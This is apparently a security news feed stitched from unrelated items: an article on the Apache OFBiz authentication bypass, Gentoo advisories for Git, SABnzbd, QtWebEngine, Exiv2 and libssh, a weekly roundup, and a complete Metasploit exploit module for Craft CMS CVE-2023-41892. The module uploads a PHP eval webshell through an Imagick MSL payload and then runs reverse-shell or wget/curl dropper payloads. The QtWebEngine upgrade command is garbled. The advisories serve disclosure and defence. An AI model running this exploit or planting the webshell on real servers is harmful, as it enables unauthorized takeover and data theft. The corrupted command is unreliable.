A new zero-day security flaw has been discovered in the Apache OfBiz, an open-source Enterprise Resource Planning (ERP) system that could be exploited to bypass authentication protections.
The vulnerability, tracked as CVE-2023-51467, resides in the login functionality and is the result of an incomplete patch for another critical vulnerability (CVE-2023-49070, CVSS score: 9.8) that was

A new zero-day security flaw has been discovered in the Apache OfBiz, an open-source Enterprise Resource Planning (ERP) system that could be exploited to bypass authentication protections.

The vulnerability, tracked as **CVE-2023-51467**, resides in the login functionality and is the result of an incomplete patch for another critical vulnerability (CVE-2023-49070, CVSS score: 9.8) that was released earlier this month.

"The security measures taken to patch CVE-2023-49070 left the root issue intact and therefore the authentication bypass was still present," the SonicWall Capture Labs threat research team, which discovered the bug, said in a statement shared with The Hacker News.

CVE-2023-49070 refers to a pre-authenticated remote code execution flaw impacting versions prior to 18.12.10 that, when successfully exploited, could allow threat actors to gain full control over the server and siphon sensitive data. It is caused due to a deprecated XML-RPC component within Apache OFBiz.

According to SonicWall, CVE-2023-51467 could be triggered using empty and invalid USERNAME and PASSWORD parameters in an HTTP request to return an authentication success message, effectively circumventing the protection and enabling a threat actor to access otherwise unauthorized internal resources.

The attack hinges on the fact that the parameter "requirePasswordChange" is set to "Y" (i.e., yes) in the URL, causing the authentication to be trivially bypassed regardless of the values passed in the username and password fields.

"The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)," according to a description of the flaw on the NIST National Vulnerability Database (NVD).

Users who rely on Apache OFbiz to update to version 18.12.11 or later as soon as possible to mitigate any potential threats.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Zero-Day in Apache OfBiz ERP System Exposes Businesses to Attack

Gentoo Linux Security Advisory 202312-15 - Several vulnerabilities have been found in Git, the worst of which could lead to remote code execution. Versions greater than or equal to 2.39.3 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-15  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Git: Multiple Vulnerabilities  
     Date: December 27, 2023  
     Bugs: #838127, #857831, #877565, #891221, #894472, #905088  
       ID: 202312-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Several vulnerabilities have been found in Git, the worst of which could  
lead to remote code execution.

Background  
==========

Git is a free and open source distributed version control system  
designed to handle everything from small to very large projects with  
speed and efficiency.

Affected packages  
=================

Package      Vulnerable    Unaffected  
-----------  ------------  ------------  
dev-vcs/git  < 2.39.3      >= 2.39.3

Description  
===========

Multiple vulnerabilities have been discovered in Git. Please review the  
CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Git users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-vcs/git-2.39.3"

References  
==========

[ 1 ] CVE-2022-23521  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23521  
[ 2 ] CVE-2022-24765  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24765  
[ 3 ] CVE-2022-29187  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29187  
[ 4 ] CVE-2022-39253  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39253  
[ 5 ] CVE-2022-39260  
      https://nvd.nist.gov/vuln/detail/CVE-2022-39260  
[ 6 ] CVE-2022-41903  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41903  
[ 7 ] CVE-2023-22490  
      https://nvd.nist.gov/vuln/detail/CVE-2023-22490  
[ 8 ] CVE-2023-23946  
      https://nvd.nist.gov/vuln/detail/CVE-2023-23946  
[ 9 ] CVE-2023-25652  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25652  
[ 10 ] CVE-2023-25815  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25815  
[ 11 ] CVE-2023-29007  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29007

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-15

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-15

Gentoo Linux Security Advisory 202312-11 - A vulnerability has been found in SABnzbd which allows for remote code execution. Versions greater than or equal to 4.0.2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: SABnzbd: Remote Code Execution  
     Date: December 23, 2023  
     Bugs: #908032  
       ID: 202312-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in SABnzbd which allows for remote code  
execution.

Background  
=========  
Free and easy binary newsreader with web interface.

Affected packages  
================  
Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
net-nntp/sabnzbd  < 4.0.2       >= 4.0.2

Description  
==========  
A vulnerability has been discovered in SABnzbd. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
A design flaw was discovered in SABnzbd that could allow remote code  
execution. Manipulating the Parameters setting in the Notification  
Script functionality allows code execution with the privileges of the  
SABnzbd process. Exploiting the vulnerabilities requires access to the  
web interface. Remote exploitation is possible if users exposed their  
setup to the internet or other untrusted networks without setting a  
username/password. By default SABnzbd is only accessible from  
`localhost`, with no authentication required for the web interface.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All SABnzbd users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-nntp/sabnzbd-4.0.2"

References  
=========  
[ 1 ] CVE-2023-34237  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34237

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-11

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-11

A list of topics we covered in the week of December 18 to December 24 of 2023

December 21, 2023 - Xfinity has notified customers that due to exploitation of the Citrix Bleed vulnerability, attackers were able to access personal data of almost 36 million customers.

December 21, 2023 - A researcher found two Microsoft vulnerabilities which could be combined to achieve zero-click remote code execution.

December 21, 2023 - Google has issued an emergency update for Chrome that fixes an actively exploited zero-day vulnerability in the WebRTC component.

December 21, 2023 - Pharmacy chain Rite Aid has been denied the right to run facial recognition systems in its stores for five years, by the FTC.

December 21, 2023 - Learn how RaaS gangs use LOTL tactics in their attacks on organizations.

 A week in security (December 18 &#8211; December 24) 

This Metasploit module exploits an unauthenticated remote code execution vulnerability in Craft CMS versions 4.0.0-RC1 through 4.4.14.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Craft CMS unauthenticated Remote Code Execution (RCE)',        'Description' => %q{          This module exploits Remote Code Execution vulnerability (CVE-2023-41892) in Craft CMS which is a popular          content management system. Craft CMS versions between 4.0.0-RC1 - 4.4.14 are  affected by this vulnerability          allowing attackers to execute arbitrary code remotely, potentially compromising the security and integrity          of the application.          The vulnerability occurs using a PHP object creation in the `\craft\controllers\ConditionsController` class          which allows to run arbitrary PHP code by escalating the object creation calling some methods available in          `\GuzzleHttp\Psr7\FnStream`. Using this vulnerability in combination with The Imagick Extension and MSL which          stands for Magick Scripting Language, a full RCE can be achieved. MSL is a built-in ImageMagick language that          facilitates the reading of images, performance of image processing tasks, and writing of results back          to the filesystem. This can be leveraged to create a dummy image containing malicious PHP code using the          Imagick constructor class delivering a webshell that can be accessed by the attacker, thereby executing the          malicious PHP code and gaining access to the system.          Because of this, any remote attacker, without authentication, can exploit this vulnerability to gain          access to the underlying operating system as the user that the web services are running as (typically www-data).        },        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module          'Thanh', # discovery          'chybeta' # poc        ],        'References' => [          [ 'CVE', '2023-41892' ],          [ 'URL', 'https://blog.calif.io/p/craftcms-rce' ],          [ 'URL', 'https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/' ],          [ 'URL', 'https://github.com/advisories/GHSA-4w8r-3xrw-v25g' ],          [ 'URL', 'https://attackerkb.com/topics/2u7OaYlv1M/cve-2023-41892' ],        ],        'License' => MSF_LICENSE,        'Platform' => [ 'unix', 'linux', 'php' ],        'Privileged' => false,        'Arch' => [ ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86 ],        'Targets' => [          [            'PHP',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Platform' => [ 'unix', 'linux' ],              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ ARCH_X64, ARCH_X86 ],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-09-13',        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 443        },        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [ true, 'Craft CMS base url', '/' ]),        OptString.new('WEBSHELL', [          false, 'The name of the webshell with extension .php. Webshell name will be randomly generated if left unset.', ''        ]),        OptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0])      ]    )  end  def check_phpinfo    # checks vulnerability running phpinfo() and returns upload_tmp_dir and DOCUMENT_ROOT    @config = { 'upload_tmp_dir' => nil, 'document_root' => nil }    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI']),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        'action' => 'conditions/render',        'configObject[class]' => 'craft\elements\conditions\ElementCondition',        'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'      }    })    if res && res.body      # parse HTML to find the upload directory and the document root provided by phpinfo command output      html = res.get_html_document      unless html.blank?        tr_items = html.css('tr td')        tr_items.each_with_index do |item, i|          next if tr_items[i + 1].nil?          if item.text.casecmp?('upload_tmp_dir')            if tr_items[i + 1].text.casecmp?('no value')              @config['upload_tmp_dir'] = '/tmp'            else              @config['upload_tmp_dir'] = tr_items[i + 1].text.strip            end          end          @config['document_root'] = tr_items[i + 1].text.strip if item.text.casecmp?('$_SERVER[\'DOCUMENT_ROOT\']')        end      end    end  end  def upload_webshell    # randomize file name if option WEBSHELL is not set    if datastore['WEBSHELL'].blank?      @webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"    else      @webshell_name = datastore['WEBSHELL'].to_s    end    # select webshell depending on the target setting (PHP or others).    @post_param = Rex::Text.rand_text_alphanumeric(1..8)    @get_param = Rex::Text.rand_text_alphanumeric(1..8)    if target['Type'] == :php      # create the MSL payload      # payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"      payload = <<~EOS        <?xml version="1.0" encoding="UTF-8"?>        <image>        <read filename="caption:<?php @eval(base64_decode($_POST[\'#{@post_param}\'])); ?>" />        <write filename="info:#{@config['document_root']}/#{@webshell_name}" />        </image>      EOS    else      # create the MSL payload      # payload = "<?=#{datastore['COMMAND']}(base64_decode($_POST[\'#{@post_param}\']));?>"      payload = <<~EOS        <?xml version="1.0" encoding="UTF-8"?>        <image>        <read filename="caption:<?=#{datastore['COMMAND']}(base64_decode($_POST[\'#{@post_param}\'])); ?>" />        <write filename="info:#{@config['document_root']}/#{@webshell_name}" />        </image>      EOS    end    # construct multipart form data with Imagick MSL payload    form_data = Rex::MIME::Message.new    form_data.add_part('conditions/render', nil, nil, 'form-data; name="action"')    form_data.add_part('craft\elements\conditions\ElementCondition', nil, nil, 'form-data; name="configObject[class]"')    form_data.add_part('{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}', nil, nil, 'form-data; name="config"')    form_data.add_part(payload, 'text/plain', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(4..8)}\"; filename=\"#{Rex::Text.rand_text_alpha(4..8)}.msl\"")    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI']),      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",      'data' => form_data.to_s    })    if res && res.code == 502      # code 502 indicates a successful upload of the MSL payload in upload_tmp_dir (default /tmp unless specified in php.ini)      # next step is to generate the webshell in DOCUMENT_ROOT by executing the Imagick MSL payload      res = send_request_cgi({        'method' => 'POST',        'uri' => normalize_uri(datastore['TARGETURI']),        'ctype' => 'application/x-www-form-urlencoded',        'vars_post' => {          'action' => 'conditions/render',          'configObject[class]' => 'craft\elements\conditions\ElementCondition',          'config' => "{\"name\":\"configObject\",\"as \":{\"class\":\"Imagick\", \"__construct()\":{\"files\":\"vid:msl:#{@config['upload_tmp_dir']}/php*\"}}}"        }      })      # code 502 indicates a successful generation of the webshell in DOCUMENT_ROOT      return res&.code == 502    end    false  end  def execute_command(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    return send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        @post_param => payload      }    })  end  def on_new_session(session)    # cleanup webshell in DOCUMENT_ROOT    register_files_for_cleanup("#{@config['document_root']}/#{@webshell_name}")    # Imagick plugin generates a php<random chars> file with MSL code in the directory set by    # the PHP ini setting "upload_tmp_dir". This file gets executed to generate the webshell.    # A manual cleanup procedure is required to identify and remove the php* files when the session is established.    if session.type == 'meterpreter'      session.fs.dir.chdir(@config['upload_tmp_dir'].to_s)      clean_files = session.fs.dir.entries    else      clean_files = session.shell_command_token("cd #{@config['upload_tmp_dir']};ls php*").split(' ')    end    unless clean_files.blank?      clean_files.each do |f|        register_files_for_cleanup("#{@config['upload_tmp_dir']}/#{f}") if f.match(/^php+/)      end    end    super  end  def check    check_phpinfo    return CheckCode::Appears unless @config['upload_tmp_dir'].nil? || @config['document_root'].nil?    CheckCode::Safe  end  def exploit    # check if upload_tmp_dir and document_root is already initialized with AutoCheck set otherwise run check_phpinfo    check_phpinfo unless datastore['AutoCheck']    fail_with(Failure::NotVulnerable, 'Could not get required phpinfo. System is likely patched.') if @config['upload_tmp_dir'].nil? || @config['document_root'].nil?    fail_with(Failure::UnexpectedReply, "Webshell #{@webshell_name} upload failed.") unless upload_webshell    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :php, :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager(linemax: 65536)    end  endend

Craft CMS 4.4.14 Remote Code Execution

Gentoo Linux Security Advisory 202312-7 - Multiple vulnerabilities have been discovered in QtWebEngine, the worst of which could lead to remote code execution. Versions greater than or equal to 5.15.11_p20231120 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: QtWebEngine: Multiple Vulnerabilities  
     Date: December 22, 2023  
     Bugs: #913050, #915465  
       ID: 202312-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilitiies have been discovered in QtWebEngine, the worst  
of which could lead to remote code execution.

Background  
=========  
QtWebEngine is a library for rendering dynamic web content in Qt5 and  
Qt6 C++ and QML applications.

Affected packages  
================  
Package             Vulnerable           Unaffected  
------------------  -------------------  --------------------  
dev-qt/qtwebengine  < 5.15.11_p20231120  >= 5.15.11_p20231120

Description  
==========  
Multiple vulnerabilities have been discovered in QtWebEngine. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All QtWebEngine users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-qt/qtwebengine-5.15.11_p20231120"

References  
=========  
[ 1 ] CVE-2023-4068  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4068  
[ 2 ] CVE-2023-4069  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4069  
[ 3 ] CVE-2023-4070  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4070  
[ 4 ] CVE-2023-4071  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4071  
[ 5 ] CVE-2023-4072  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4072  
[ 6 ] CVE-2023-4073  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4073  
[ 7 ] CVE-2023-4074  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4074  
[ 8 ] CVE-2023-4075  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4075  
[ 9 ] CVE-2023-4076  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4076  
[ 10 ] CVE-2023-4077  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4077  
[ 11 ] CVE-2023-4078  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4078  
[ 12 ] CVE-2023-4761  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4761  
[ 13 ] CVE-2023-4762  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4762  
[ 14 ] CVE-2023-4763  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4763  
[ 15 ] CVE-2023-4764  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4764  
[ 16 ] CVE-2023-5218  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5218  
[ 17 ] CVE-2023-5473  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5473  
[ 18 ] CVE-2023-5474  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5474  
[ 19 ] CVE-2023-5475  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5475  
[ 20 ] CVE-2023-5476  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5476  
[ 21 ] CVE-2023-5477  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5477  
[ 22 ] CVE-2023-5478  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5478  
[ 23 ] CVE-2023-5479  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5479  
[ 24 ] CVE-2023-5480  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5480  
[ 25 ] CVE-2023-5481  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5481  
[ 26 ] CVE-2023-5482  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5482  
[ 27 ] CVE-2023-5483  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5483  
[ 28 ] CVE-2023-5484  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5484  
[ 29 ] CVE-2023-5485  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5485  
[ 30 ] CVE-2023-5486  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5486  
[ 31 ] CVE-2023-5487  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5487  
[ 32 ] CVE-2023-5849  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5849  
[ 33 ] CVE-2023-5850  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5850  
[ 34 ] CVE-2023-5851  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5851  
[ 35 ] CVE-2023-5852  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5852  
[ 36 ] CVE-2023-5853  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5853  
[ 37 ] CVE-2023-5854  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5854  
[ 38 ] CVE-2023-5855  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5855  
[ 39 ] CVE-2023-5856  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5856  
[ 40 ] CVE-2023-5857  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5857  
[ 41 ] CVE-2023-5858  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5858  
[ 42 ] CVE-2023-5859  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5859  
[ 43 ] CVE-2023-5996  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5996  
[ 44 ] CVE-2023-5997  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5997  
[ 45 ] CVE-2023-6112  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6112

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-07

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-07

Gentoo Linux Security Advisory 202312-6 - Multiple vulnerabilities have been discovered in Exiv2, the worst of which can lead to remote code execution. Versions greater than or equal to 0.28.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Exiv2: Multiple Vulnerabilities  
     Date: December 22, 2023  
     Bugs: #785646, #807346, #917650  
       ID: 202312-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Exiv2, the worst of  
which can lead to remote code execution.

Background  
=========  
Exiv2 is a C++ library and set of tools for parsing, editing and saving  
Exif and IPTC metadata from images. Exif, the Exchangeable image file  
format, specifies the addition of metadata tags to JPEG, TIFF and RIFF  
files.

Affected packages  
================  
Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
media-gfx/exiv2  < 0.28.1      >= 0.28.1

Description  
==========  
Multiple vulnerabilities have been discovered in Exiv2. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Exiv2 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-gfx/exiv2-0.28.1"

References  
=========  
[ 1 ] CVE-2020-18771  
      https://nvd.nist.gov/vuln/detail/CVE-2020-18771  
[ 2 ] CVE-2020-18773  
      https://nvd.nist.gov/vuln/detail/CVE-2020-18773  
[ 3 ] CVE-2020-18774  
      https://nvd.nist.gov/vuln/detail/CVE-2020-18774  
[ 4 ] CVE-2020-18899  
      https://nvd.nist.gov/vuln/detail/CVE-2020-18899  
[ 5 ] CVE-2021-29457  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29457  
[ 6 ] CVE-2021-29458  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29458  
[ 7 ] CVE-2021-29463  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29463  
[ 8 ] CVE-2021-29464  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29464  
[ 9 ] CVE-2021-29470  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29470  
[ 10 ] CVE-2021-29473  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29473  
[ 11 ] CVE-2021-29623  
      https://nvd.nist.gov/vuln/detail/CVE-2021-29623  
[ 12 ] CVE-2021-31291  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31291  
[ 13 ] CVE-2021-31292  
      https://nvd.nist.gov/vuln/detail/CVE-2021-31292  
[ 14 ] CVE-2021-32617  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32617  
[ 15 ] CVE-2021-32815  
      https://nvd.nist.gov/vuln/detail/CVE-2021-32815  
[ 16 ] CVE-2021-34334  
      https://nvd.nist.gov/vuln/detail/CVE-2021-34334  
[ 17 ] CVE-2021-34335  
      https://nvd.nist.gov/vuln/detail/CVE-2021-34335  
[ 18 ] CVE-2021-37615  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37615  
[ 19 ] CVE-2021-37616  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37616  
[ 20 ] CVE-2021-37618  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37618  
[ 21 ] CVE-2021-37619  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37619  
[ 22 ] CVE-2021-37620  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37620  
[ 23 ] CVE-2021-37621  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37621  
[ 24 ] CVE-2021-37622  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37622  
[ 25 ] CVE-2021-37623  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37623  
[ 26 ] CVE-2023-44398  
      https://nvd.nist.gov/vuln/detail/CVE-2023-44398

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-06

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-06

Gentoo Linux Security Advisory 202312-5 - Multiple vulnerabilities have been discovered in libssh, the worst of which could lead to remote code execution. Versions greater than or equal to 0.10.5 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202312-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: libssh: Multiple Vulnerabilities  
     Date: December 22, 2023  
     Bugs: #810517, #905746  
       ID: 202312-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in libssh, the worst of  
which could lead to remote code execution.

Background  
=========  
libssh is a multiplatform C library implementing the SSHv2 protocol on  
client and server side.

Affected packages  
================  
Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
net-libs/libssh  < 0.10.5      >= 0.10.5

Description  
==========  
Multiple vulnerabilities have been discovered in libssh. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All libssh users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/libssh-0.10.5"

References  
=========  
[ 1 ] CVE-2021-3634  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3634  
[ 2 ] CVE-2023-1667  
      https://nvd.nist.gov/vuln/detail/CVE-2023-1667  
[ 3 ] CVE-2023-2283  
      https://nvd.nist.gov/vuln/detail/CVE-2023-2283  
[ 4 ] GHSL-2023-085

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202312-05

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202312-05

